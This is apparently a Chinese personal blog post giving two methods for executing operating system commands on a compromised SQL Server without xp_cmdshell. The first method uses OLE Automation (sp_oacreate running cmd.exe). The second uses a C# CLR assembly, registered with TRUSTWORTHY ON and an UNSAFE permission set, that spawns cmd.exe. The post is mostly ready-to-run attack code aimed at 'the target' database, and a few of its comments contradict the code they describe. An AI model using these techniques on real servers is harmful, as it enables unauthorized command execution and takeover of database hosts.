sql server没xp_cmdshell执行命令

Writing
创建时间:
阅读:
  1. 利用COM执行命令
  2. 编写CLR实现执行命令

利用COM执行命令

(需要开启Ole Automation Procedures组件)

declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
exec sp_oamethod @luan,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out;
select @str;

没有开启Ole Automation Procedures,可以用下面的命令开启

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO

编写CLR实现执行命令

编写语言:C#
Vs创建类库

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System;
using System.Threading.Tasks;

namespace shellexec
{
    public class exec
    {
        public static string cmd(string command)
        {
            System.Diagnostics.Process pro = new System.Diagnostics.Process();
            pro.StartInfo.FileName = "cmd.exe";
            pro.StartInfo.UseShellExecute = false;
            pro.StartInfo.RedirectStandardError = true; //标准错误
            pro.StartInfo.RedirectStandardInput = true; //标准输入
            pro.StartInfo.RedirectStandardOutput = true; //标准输出
            pro.StartInfo.CreateNoWindow = true; //是否在新窗口开启进程
            pro.Start();
            pro.StandardInput.WriteLine(command + "&&exit"); //命令参数写入
            pro.StandardInput.AutoFlush = true; //缓冲区自动刷新
            string output = pro.StandardOutput.ReadToEnd(); //读取执行结果
            pro.WaitForExit(); //等待执行完成退出
            pro.Close();
            return output.ToString();
        }
    }
}

生成dll后,可以用hex的方法写到目标,或者shell上传。然后开始构造
1.目标数据库实例需要启用clr集成

exec sp_configure 'clr enabled', 1;--在SQL Server中启用CLR
reconfigure;
go

2.目标数据库的可信任属性需要设为false,可以使用以下语句启用

ALTER DATABASE [<数据库名称>] SET TRUSTWORTHY ON

3.在数据库中注册DLL

CREATE ASSEMBLY MySqlCLR FROM '<dll的路径>' //MySqlCLR为导入dll后的变量名称

4.创建函数
(根据对应函数的类型的参数构造对应的参数类型,然后RETURNS [nvarchar] (max)记得设置为返回最大如果是返回string类型的话),在直接这个dll的名称在那个命名空间、类、函数)

CREATE FUNCTION [dbo].[cmd2]  
(  
    @cmd AS NVARCHAR(max)
)  
RETURNS [nvarchar] (max) WITH EXECUTE AS CALLER
AS  
EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd //shellexec为命名空间,exec为类名,cmd为函数名
GO

5.程序集的权限级别必须设为 external access,否则在部署的时候会报错

ALTER ASSEMBLY [MySqlCLR]
WITH PERMISSION_SET = UNSAFE

6.调用存储过程和函数方法

select [dbo].[cmd2]('whoami')

参考链接:
https://blog.csdn.net/catchme_439/article/details/78411009
https://zhuanlan.zhihu.com/p/33322584?from_voters_page=true

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:sql server没xp_cmdshell执行命令

本文作者:九世

发布时间:2021-01-07, 08:32:40

最后更新:2021-01-07, 08:43:01

原始链接:http://jiushill.github.io/posts/639a5410.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2016-2019 Yelog

Built with Hexo and 3-hexo theme

目录